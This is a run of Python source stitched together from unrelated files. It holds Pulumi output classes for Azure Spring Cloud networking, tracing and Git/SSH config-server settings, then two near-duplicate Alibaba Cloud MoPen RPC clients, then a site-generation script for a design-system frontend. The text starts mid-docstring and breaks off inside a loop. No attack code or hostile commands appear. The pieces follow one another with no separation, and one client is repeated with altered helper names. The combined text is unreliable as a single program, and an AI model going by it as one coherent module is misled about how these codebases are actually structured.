        The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        """
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> Optional[bool]:
        """
        Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceNetwork(dict):
    @staticmethod
    def __key_warning(key: str):
        # Map camelCase wire keys to the snake_case property names that
        # callers should use instead of raw dict access.
        suggestions = {
            "appSubnetId": "app_subnet_id",
            "cidrRanges": "cidr_ranges",
            "serviceRuntimeSubnetId": "service_runtime_subnet_id",
            "appNetworkResourceGroup": "app_network_resource_group",
            "serviceRuntimeNetworkResourceGroup": "service_runtime_network_resource_group",
        }
        suggest = suggestions.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceNetwork. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceNetwork.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceNetwork.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 app_subnet_id: str,
                 cidr_ranges: Sequence[str],
                 service_runtime_subnet_id: str,
                 app_network_resource_group: Optional[str] = None,
                 service_runtime_network_resource_group: Optional[str] = None):
        """
        :param str app_subnet_id: ID of the Subnet hosting the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
        :param Sequence[str] cidr_ranges: A list of (at least 3) CIDR ranges (at least /16) hosting the Spring Cloud infrastructure; must not overlap any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
        :param str service_runtime_subnet_id: ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
        :param str app_network_resource_group: Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
        :param str service_runtime_network_resource_group: Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "app_subnet_id", app_subnet_id)
        pulumi.set(__self__, "cidr_ranges", cidr_ranges)
        pulumi.set(__self__, "service_runtime_subnet_id", service_runtime_subnet_id)
        # Optional fields are only stored when explicitly supplied.
        for field_name, value in (
            ("app_network_resource_group", app_network_resource_group),
            ("service_runtime_network_resource_group", service_runtime_network_resource_group),
        ):
            if value is not None:
                pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="appSubnetId")
    def app_subnet_id(self) -> str:
        """ID of the Subnet hosting the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created."""
        return pulumi.get(self, "app_subnet_id")

    @property
    @pulumi.getter(name="cidrRanges")
    def cidr_ranges(self) -> Sequence[str]:
        """A list of (at least 3) CIDR ranges (at least /16) hosting the Spring Cloud infrastructure; must not overlap any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created."""
        return pulumi.get(self, "cidr_ranges")

    @property
    @pulumi.getter(name="serviceRuntimeSubnetId")
    def service_runtime_subnet_id(self) -> str:
        """ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created."""
        return pulumi.get(self, "service_runtime_subnet_id")

    @property
    @pulumi.getter(name="appNetworkResourceGroup")
    def app_network_resource_group(self) -> Optional[str]:
        """Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created."""
        return pulumi.get(self, "app_network_resource_group")

    @property
    @pulumi.getter(name="serviceRuntimeNetworkResourceGroup")
    def service_runtime_network_resource_group(self) -> Optional[str]:
        """Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created."""
        return pulumi.get(self, "service_runtime_network_resource_group")
@pulumi.output_type
class SpringCloudServiceRequiredNetworkTrafficRule(dict):
    @staticmethod
    def __key_warning(key: str):
        # Only one camelCase key needs redirecting to its snake_case property.
        suggest = "ip_addresses" if key == "ipAddresses" else None
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceRequiredNetworkTrafficRule. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 direction: Optional[str] = None,
                 fqdns: Optional[Sequence[str]] = None,
                 ip_addresses: Optional[Sequence[str]] = None,
                 port: Optional[int] = None,
                 protocol: Optional[str] = None):
        """
        :param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
        :param Sequence[str] fqdns: The FQDN list of required traffic.
        :param Sequence[str] ip_addresses: The IP address list of required traffic.
        :param int port: The port of required traffic.
        :param str protocol: The protocol of required traffic.
        """
        # All fields are optional; store only the ones that were supplied.
        for field_name, value in (
            ("direction", direction),
            ("fqdns", fqdns),
            ("ip_addresses", ip_addresses),
            ("port", port),
            ("protocol", protocol),
        ):
            if value is not None:
                pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """The direction of required traffic. Possible values are `Inbound`, `Outbound`."""
        return pulumi.get(self, "direction")

    @property
    @pulumi.getter
    def fqdns(self) -> Optional[Sequence[str]]:
        """The FQDN list of required traffic."""
        return pulumi.get(self, "fqdns")

    @property
    @pulumi.getter(name="ipAddresses")
    def ip_addresses(self) -> Optional[Sequence[str]]:
        """The IP address list of required traffic."""
        return pulumi.get(self, "ip_addresses")

    @property
    @pulumi.getter
    def port(self) -> Optional[int]:
        """The port of required traffic."""
        return pulumi.get(self, "port")

    @property
    @pulumi.getter
    def protocol(self) -> Optional[str]:
        """The protocol of required traffic."""
        return pulumi.get(self, "protocol")
@pulumi.output_type
class SpringCloudServiceTrace(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names
        suggestions = {
            "instrumentationKey": "instrumentation_key",
            "sampleRate": "sample_rate",
        }
        suggest = suggestions.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceTrace. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceTrace.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceTrace.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 instrumentation_key: str,
                 sample_rate: Optional[float] = None):
        """
        :param str instrumentation_key: The Instrumentation Key used for Application Insights.
        :param float sample_rate: The sampling rate of Application Insights Agent, between `0.0` and `100.0`. Defaults to `10.0`.
        """
        pulumi.set(__self__, "instrumentation_key", instrumentation_key)
        # Only persist the sampling rate when the caller supplied one.
        if sample_rate is not None:
            pulumi.set(__self__, "sample_rate", sample_rate)

    @property
    @pulumi.getter(name="instrumentationKey")
    def instrumentation_key(self) -> str:
        """The Instrumentation Key used for Application Insights."""
        return pulumi.get(self, "instrumentation_key")

    @property
    @pulumi.getter(name="sampleRate")
    def sample_rate(self) -> Optional[float]:
        """The sampling rate of Application Insights Agent, between `0.0` and `100.0`. Defaults to `10.0`."""
        return pulumi.get(self, "sample_rate")
@pulumi.output_type
class GetSpringCloudAppIdentityResult(dict):
    def __init__(__self__, *,
                 principal_id: str,
                 tenant_id: str,
                 type: str):
        """
        :param str principal_id: The Principal ID of the Service Principal associated with this Spring Cloud Application's Managed Service Identity.
        :param str tenant_id: The Tenant ID of the Service Principal associated with this Spring Cloud Application's Managed Service Identity.
        :param str type: The Type of Managed Identity assigned to the Spring Cloud Application.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("principal_id", principal_id),
            ("tenant_id", tenant_id),
            ("type", type),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> str:
        """The Principal ID of the Service Principal associated with this application's Managed Service Identity."""
        return pulumi.get(self, "principal_id")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> str:
        """The Tenant ID of the Service Principal associated with this application's Managed Service Identity."""
        return pulumi.get(self, "tenant_id")

    @property
    @pulumi.getter
    def type(self) -> str:
        """The Type of Managed Identity assigned to the Spring Cloud Application."""
        return pulumi.get(self, "type")
@pulumi.output_type
class GetSpringCloudAppPersistentDiskResult(dict):
    def __init__(__self__, *,
                 mount_path: str,
                 size_in_gb: int):
        """
        :param str mount_path: The mount path of the persistent disk.
        :param int size_in_gb: The size of the persistent disk in GB.
        """
        # Both fields of this read-only result are required.
        for field_name, value in (
            ("mount_path", mount_path),
            ("size_in_gb", size_in_gb),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="mountPath")
    def mount_path(self) -> str:
        """The mount path of the persistent disk."""
        return pulumi.get(self, "mount_path")

    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> int:
        """The size of the persistent disk in GB."""
        return pulumi.get(self, "size_in_gb")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingResult(dict):
    def __init__(__self__, *,
                 http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult'],
                 label: str,
                 repositories: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult'],
                 search_paths: Sequence[str],
                 ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult'],
                 uri: str):
        """
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository: a branch name, tag name, or commit-id of the repository.
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingSshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
        :param str uri: The URI of the Git repository.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("http_basic_auths", http_basic_auths),
            ("label", label),
            ("repositories", repositories),
            ("search_paths", search_paths),
            ("ssh_auths", ssh_auths),
            ("uri", uri),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="httpBasicAuths")
    def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult']:
        """A `http_basic_auth` block as defined below."""
        return pulumi.get(self, "http_basic_auths")

    @property
    @pulumi.getter
    def label(self) -> str:
        """The default label of the Git repository: a branch name, tag name, or commit-id of the repository."""
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def repositories(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult']:
        """One or more `repository` blocks as defined below."""
        return pulumi.get(self, "repositories")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Sequence[str]:
        """An array of strings used to search subdirectories of the Git repository."""
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuths")
    def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult']:
        """A `ssh_auth` block as defined below."""
        return pulumi.get(self, "ssh_auths")

    @property
    @pulumi.getter
    def uri(self) -> str:
        """The URI of the Git repository."""
        return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult(dict):
    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Http Basic Authentication Git repository server.
        :param str username: The username used to access the Http Basic Authentication Git repository server.
        """
        # Both credentials of this read-only result are required.
        for field_name, value in (("password", password), ("username", username)):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter
    def password(self) -> str:
        """The password used to access the Http Basic Authentication Git repository server."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """The username used to access the Http Basic Authentication Git repository server."""
        return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryResult(dict):
    def __init__(__self__, *,
                 http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult'],
                 label: str,
                 name: str,
                 patterns: Sequence[str],
                 search_paths: Sequence[str],
                 ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult'],
                 uri: str):
        """
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository: a branch name, tag name, or commit-id of the repository.
        :param str name: The name of the Spring Cloud Service resource.
        :param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
        :param str uri: The URI of the Git repository.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("http_basic_auths", http_basic_auths),
            ("label", label),
            ("name", name),
            ("patterns", patterns),
            ("search_paths", search_paths),
            ("ssh_auths", ssh_auths),
            ("uri", uri),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="httpBasicAuths")
    def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult']:
        """A `http_basic_auth` block as defined below."""
        return pulumi.get(self, "http_basic_auths")

    @property
    @pulumi.getter
    def label(self) -> str:
        """The default label of the Git repository: a branch name, tag name, or commit-id of the repository."""
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def name(self) -> str:
        """The name of the Spring Cloud Service resource."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def patterns(self) -> Sequence[str]:
        """An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards."""
        return pulumi.get(self, "patterns")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Sequence[str]:
        """An array of strings used to search subdirectories of the Git repository."""
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuths")
    def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult']:
        """A `ssh_auth` block as defined below."""
        return pulumi.get(self, "ssh_auths")

    @property
    @pulumi.getter
    def uri(self) -> str:
        """The URI of the Git repository."""
        return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult(dict):
    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Http Basic Authentication Git repository server.
        :param str username: The username used to access the Http Basic Authentication Git repository server.
        """
        # Both credentials of this read-only result are required.
        for field_name, value in (("password", password), ("username", username)):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter
    def password(self) -> str:
        """The password used to access the Http Basic Authentication Git repository server."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """The username used to access the Http Basic Authentication Git repository server."""
        return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult(dict):
    def __init__(__self__, *,
                 host_key: str,
                 host_key_algorithm: str,
                 private_key: str,
                 strict_host_key_checking_enabled: bool):
        """
        :param str host_key: The host key of the Git repository server.
        :param str host_key_algorithm: The host key algorithm.
        :param str private_key: The SSH private key used to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
        :param bool strict_host_key_checking_enabled: Whether the Config Server instance will fail to start if the host_key does not match.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("host_key", host_key),
            ("host_key_algorithm", host_key_algorithm),
            ("private_key", private_key),
            ("strict_host_key_checking_enabled", strict_host_key_checking_enabled),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> str:
        """The host key of the Git repository server."""
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> str:
        """The host key algorithm."""
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """The SSH private key used to access the Git repository, needed when the URI starts with `git@` or `ssh://`."""
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> bool:
        """Whether the Config Server instance will fail to start if the host_key does not match."""
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingSshAuthResult(dict):
    def __init__(__self__, *,
                 host_key: str,
                 host_key_algorithm: str,
                 private_key: str,
                 strict_host_key_checking_enabled: bool):
        """
        :param str host_key: The host key of the Git repository server.
        :param str host_key_algorithm: The host key algorithm.
        :param str private_key: The SSH private key used to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
        :param bool strict_host_key_checking_enabled: Whether the Config Server instance will fail to start if the host_key does not match.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("host_key", host_key),
            ("host_key_algorithm", host_key_algorithm),
            ("private_key", private_key),
            ("strict_host_key_checking_enabled", strict_host_key_checking_enabled),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> str:
        """The host key of the Git repository server."""
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> str:
        """The host key algorithm."""
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """The SSH private key used to access the Git repository, needed when the URI starts with `git@` or `ssh://`."""
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> bool:
        """Whether the Config Server instance will fail to start if the host_key does not match."""
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceRequiredNetworkTrafficRuleResult(dict):
    def __init__(__self__, *,
                 direction: str,
                 fqdns: Sequence[str],
                 ip_addresses: Sequence[str],
                 port: int,
                 protocol: str):
        """
        :param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
        :param Sequence[str] fqdns: The FQDN list of required traffic.
        :param Sequence[str] ip_addresses: The IP address list of required traffic.
        :param int port: The port of required traffic.
        :param str protocol: The protocol of required traffic.
        """
        # All fields of this read-only result are required.
        for field_name, value in (
            ("direction", direction),
            ("fqdns", fqdns),
            ("ip_addresses", ip_addresses),
            ("port", port),
            ("protocol", protocol),
        ):
            pulumi.set(__self__, field_name, value)

    @property
    @pulumi.getter
    def direction(self) -> str:
        """The direction of required traffic. Possible values are `Inbound`, `Outbound`."""
        return pulumi.get(self, "direction")

    @property
    @pulumi.getter
    def fqdns(self) -> Sequence[str]:
        """The FQDN list of required traffic."""
        return pulumi.get(self, "fqdns")

    @property
    @pulumi.getter(name="ipAddresses")
    def ip_addresses(self) -> Sequence[str]:
        """The IP address list of required traffic."""
        return pulumi.get(self, "ip_addresses")

    @property
    @pulumi.getter
    def port(self) -> int:
        """The port of required traffic."""
        return pulumi.get(self, "port")

    @property
    @pulumi.getter
    def protocol(self) -> str:
        """The protocol of required traffic."""
        return pulumi.get(self, "protocol")
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class MoPenClient(AlibabaCloudClient):
    """Client for the Alibaba Cloud MoPen product, API version 2018-02-11.

    Every operation is an RPC-style HTTPS POST with its parameters in the
    request body; the shared plumbing lives in :meth:`_call`.
    """

    def __init__(self, client_config, credentials_provider=None, retry_policy=None,
                 endpoint_resolver=None):
        AlibabaCloudClient.__init__(self, client_config,
                                    credentials_provider=credentials_provider,
                                    retry_policy=retry_policy,
                                    endpoint_resolver=endpoint_resolver)
        self.product_code = 'MoPen'
        self.api_version = '2018-02-11'
        self.location_service_code = 'mopen'
        self.location_endpoint_type = 'openAPI'

    def _call(self, action, params):
        """Build the RPC request for *action*, send it, and return the result."""
        api_request = APIRequest(action, 'POST', 'https', 'RPC', 'body')
        api_request._params = params
        return self._handle_request(api_request).result

    def mo_pen_find_group(self, creator=None):
        """Invoke the MoPenFindGroup operation."""
        return self._call('MoPenFindGroup', {"Creator": creator})

    def mo_pen_query_canvas(self, device_name=None, session_id=None, page_id=None, status=None):
        """Invoke the MoPenQueryCanvas operation."""
        return self._call('MoPenQueryCanvas', {
            "DeviceName": device_name,
            "SessionId": session_id,
            "PageId": page_id,
            "Status": status})

    def mo_pen_do_recognize(
            self,
            canvas_id=None,
            end_y=None,
            end_x=None,
            json_conf=None,
            export_type=None,
            start_y=None,
            start_x=None):
        """Invoke the MoPenDoRecognize operation."""
        return self._call('MoPenDoRecognize', {
            "CanvasId": canvas_id,
            "EndY": end_y,
            "EndX": end_x,
            "JsonConf": json_conf,
            "ExportType": export_type,
            "StartY": start_y,
            "StartX": start_x})

    def mo_pen_send_mqtt_message(self, payload=None, device_name=None):
        """Invoke the MoPenSendMqttMessage operation."""
        return self._call('MoPenSendMqttMessage', {"Payload": payload, "DeviceName": device_name})

    def mopen_create_group(self, creator=None):
        """Invoke the MopenCreateGroup operation.

        NOTE: the method name mirrors the action's 'Mopen' casing.
        """
        return self._call('MopenCreateGroup', {"Creator": creator})

    def mo_pen_add_group_member(self, group_id=None, device_name=None):
        """Invoke the MoPenAddGroupMember operation."""
        return self._call('MoPenAddGroupMember', {"GroupId": group_id, "DeviceName": device_name})

    def mo_pen_delete_group(self, group_id=None):
        """Invoke the MoPenDeleteGroup operation."""
        return self._call('MoPenDeleteGroup', {"GroupId": group_id})

    def mo_pen_bind_isv(self, order_key=None, device_name=None):
        """Invoke the MoPenBindIsv operation."""
        return self._call('MoPenBindIsv', {"OrderKey": order_key, "DeviceName": device_name})

    def mo_pen_delete_group_member(self, group_id=None, device_name=None):
        """Invoke the MoPenDeleteGroupMember operation."""
        return self._call('MoPenDeleteGroupMember', {"GroupId": group_id, "DeviceName": device_name})

    def mo_pen_create_device(self, device_name=None, device_type=None):
        """Invoke the MoPenCreateDevice operation."""
        return self._call('MoPenCreateDevice', {"DeviceName": device_name, "DeviceType": device_type})
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class MoPenClient(AlibabaCloudClient):
    """Client for the Alibaba Cloud MoPen product, API version 2018-02-11.

    Each public method maps one-to-one onto an RPC action; request
    construction and dispatch are shared in :meth:`_invoke`.
    """

    def __init__(self, client_config, credentials_provider=None, retry_policy=None,
                 endpoint_resolver=None):
        AlibabaCloudClient.__init__(self, client_config,
                                    credentials_provider=credentials_provider,
                                    retry_policy=retry_policy,
                                    endpoint_resolver=endpoint_resolver)
        self.product_code = 'MoPen'
        self.api_version = '2018-02-11'
        self.location_service_code = 'mopen'
        self.location_endpoint_type = 'openAPI'

    def _invoke(self, action, params):
        """Send the RPC-style HTTPS POST for *action* and return its result."""
        request = APIRequest(action, 'POST', 'https', 'RPC', 'body')
        request._params = params
        return self._handle_request(request).result

    def mo_pen_find_group(self, creator=None):
        """Invoke the MoPenFindGroup operation."""
        return self._invoke('MoPenFindGroup', {"Creator": creator})

    def mo_pen_query_canvas(self, device_name=None, session_id=None, page_id=None, status=None):
        """Invoke the MoPenQueryCanvas operation."""
        return self._invoke('MoPenQueryCanvas', {
            "DeviceName": device_name,
            "SessionId": session_id,
            "PageId": page_id,
            "Status": status})

    def mo_pen_do_recognize(
            self,
            canvas_id=None,
            end_y=None,
            end_x=None,
            json_conf=None,
            export_type=None,
            start_y=None,
            start_x=None):
        """Invoke the MoPenDoRecognize operation."""
        return self._invoke('MoPenDoRecognize', {
            "CanvasId": canvas_id,
            "EndY": end_y,
            "EndX": end_x,
            "JsonConf": json_conf,
            "ExportType": export_type,
            "StartY": start_y,
            "StartX": start_x})

    def mo_pen_send_mqtt_message(self, payload=None, device_name=None):
        """Invoke the MoPenSendMqttMessage operation."""
        return self._invoke('MoPenSendMqttMessage', {"Payload": payload, "DeviceName": device_name})

    def mopen_create_group(self, creator=None):
        """Invoke the MopenCreateGroup operation.

        NOTE: the method name mirrors the action's 'Mopen' casing.
        """
        return self._invoke('MopenCreateGroup', {"Creator": creator})

    def mo_pen_add_group_member(self, group_id=None, device_name=None):
        """Invoke the MoPenAddGroupMember operation."""
        return self._invoke('MoPenAddGroupMember', {"GroupId": group_id, "DeviceName": device_name})

    def mo_pen_delete_group(self, group_id=None):
        """Invoke the MoPenDeleteGroup operation."""
        return self._invoke('MoPenDeleteGroup', {"GroupId": group_id})

    def mo_pen_bind_isv(self, order_key=None, device_name=None):
        """Invoke the MoPenBindIsv operation."""
        return self._invoke('MoPenBindIsv', {"OrderKey": order_key, "DeviceName": device_name})

    def mo_pen_delete_group_member(self, group_id=None, device_name=None):
        """Invoke the MoPenDeleteGroupMember operation."""
        return self._invoke('MoPenDeleteGroupMember', {"GroupId": group_id, "DeviceName": device_name})

    def mo_pen_create_device(self, device_name=None, device_type=None):
        """Invoke the MoPenCreateDevice operation."""
        return self._invoke('MoPenCreateDevice', {"DeviceName": device_name, "DeviceType": device_type})
import os
import sys
import glob
import jinja2
import codecs
import markdown
from bin.jinja_setup import setup_jinja
from bin.markdown_jinja import MarkdownJinja
from frontend.digital_land_frontend.filters import organisation_mapper
from frontmatter import Frontmatter
# All generated pages are written beneath this directory.
docs = "docs/"


def render(path, template, **kwargs):
    """Render *template* with **kwargs and write it under the docs/ tree.

    *path* is relative to the docs root; intermediate directories are
    created on demand.
    """
    path = os.path.join(docs, path)
    directory = os.path.dirname(path)
    if directory:
        # exist_ok avoids the check-then-create race of the previous
        # os.path.exists()/os.makedirs() pair.
        os.makedirs(directory, exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(template.render(**kwargs))
# Shared jinja environment; every page render below goes through it.
env = setup_jinja()

# get page templates
index_template = env.get_template("index.html")
get_started_template = env.get_template("getting-started.html")
example_template = env.get_template("iframe-base.html")
component_template = env.get_template("component-page.html")

# data for organisation autocomplete
orgs = [
    {"value": k, "text": v} for k, v in organisation_mapper.organisations.all().items()
]

# init markdown
# give it access to the configured jinja.environment
# and any macros that might be used in the markdown files
# NOTE: this single Markdown instance is reused for every document
# converted by compile_markdown() below.
md = markdown.Markdown(
    extensions=[
        MarkdownJinja(
            env=env,
            macros={
                "designSystemExample": "design-system/components/example/macro.html"
            },
        ),
        "fenced_code",
        "tables",
    ]
)
def compile_markdown(s):
    """Convert markdown *s* to HTML and tag it with GOV.UK design-system classes.

    The substitutions are plain-text tag matches applied in order, so the
    markdown output is assumed not to put attributes on those tags itself.
    """
    html = md.convert(s)
    # reset() clears per-document parser state so the shared module-level
    # Markdown instance can safely convert many documents in one run
    # (recommended by the Python-Markdown docs when reusing an instance).
    md.reset()
    replacements = (
        ("<p>", '<p class="govuk-body">'),
        ("<h1>", '<h1 class="govuk-heading-xl">'),
        ("<h2>", '<h2 class="govuk-heading-l">'),
        ("<h3>", '<h3 class="govuk-heading-m">'),
        ("<h4>", '<h4 class="govuk-heading-s">'),
        ("<ul>", '<ul class="govuk-list govuk-list--bullet">'),
        ("<pre>", '<pre class="hljs-container">'),
        ("<table", '<table class="govuk-table" '),
        ("<thead>", '<thead class="govuk-table__head">'),
        ("<tbody>", '<tbody class="govuk-table__body">'),
        ("<tr>", '<tr class="govuk-table__row">'),
        ("<th>", '<th scope="row" class="govuk-table__header">'),
        ("<td>", '<td class="govuk-table__cell">'),
    )
    for old, new in replacements:
        html = html.replace(old, new)
    return html
def read_markdown_file(p):
    """Return the full contents of the markdown file at *p* as a string.

    The previous implementation leaked the file handle (it was never
    closed) and relied on the locale's default encoding.
    """
    with open(p, mode="r", encoding="utf-8") as f:
        return f.read()
def render_markdown_file(file_, dest_file, template, **kwargs):
    """Compile the markdown file *file_* and write it to *dest_file* via *template*."""
    body = compile_markdown(read_markdown_file(file_))
    render(dest_file, template, rendered_markdown=body, **kwargs)
def get_components(components_dir):
    """Return the names of the component directories beneath *components_dir*.

    Uses os.path.basename rather than splitting on "/" so the result is
    correct regardless of the platform's path separator.
    """
    components = [os.path.basename(d) for d, _subdirs, _files in os.walk(components_dir)]
    # the top-level "components" directory itself is not a component
    if "components" in components:
        components.remove("components")
    return components
def render_example_pages(name, src_dir, dest, jinja_path, **kwargs):
    """Render a standalone page for every example HTML file of component *name*."""
    for file_path in glob.glob(f"{src_dir}/{name}/*.html"):
        # macro files are jinja imports, not pages in their own right
        if "macro.html" in file_path:
            continue
        example = os.path.basename(file_path)
        render(
            f"{dest}/{name}/{example}",
            example_template,
            partial_name=f"{jinja_path}/{name}/{example}",
            **kwargs,
        )
def is_displaying_map(documentation):
    """Return the frontmatter `contains_map` attribute, or None when there are no attributes."""
    attributes = documentation["attributes"]
    if attributes is None:
        return None
    return attributes.get("contains_map")
def reqs_org_data(documentation):
    """Return the frontmatter `requires_orgs` attribute, or None when there are no attributes."""
    attributes = documentation["attributes"]
    if attributes is None:
        return None
    return attributes.get("requires_orgs")
def generate_component_documentation_pages(component_sets):
    """Render the documentation page and example pages for every component.

    *component_sets* is a list of dicts with a `type` (source folder) and a
    `dest` (output folder / site section).
    """
    for cset in component_sets:
        src_dir = f"src/{cset['type']}/components"
        components = get_components(src_dir)
        for component in components:
            jinja_input_path = f"examples/{cset['type']}/components"
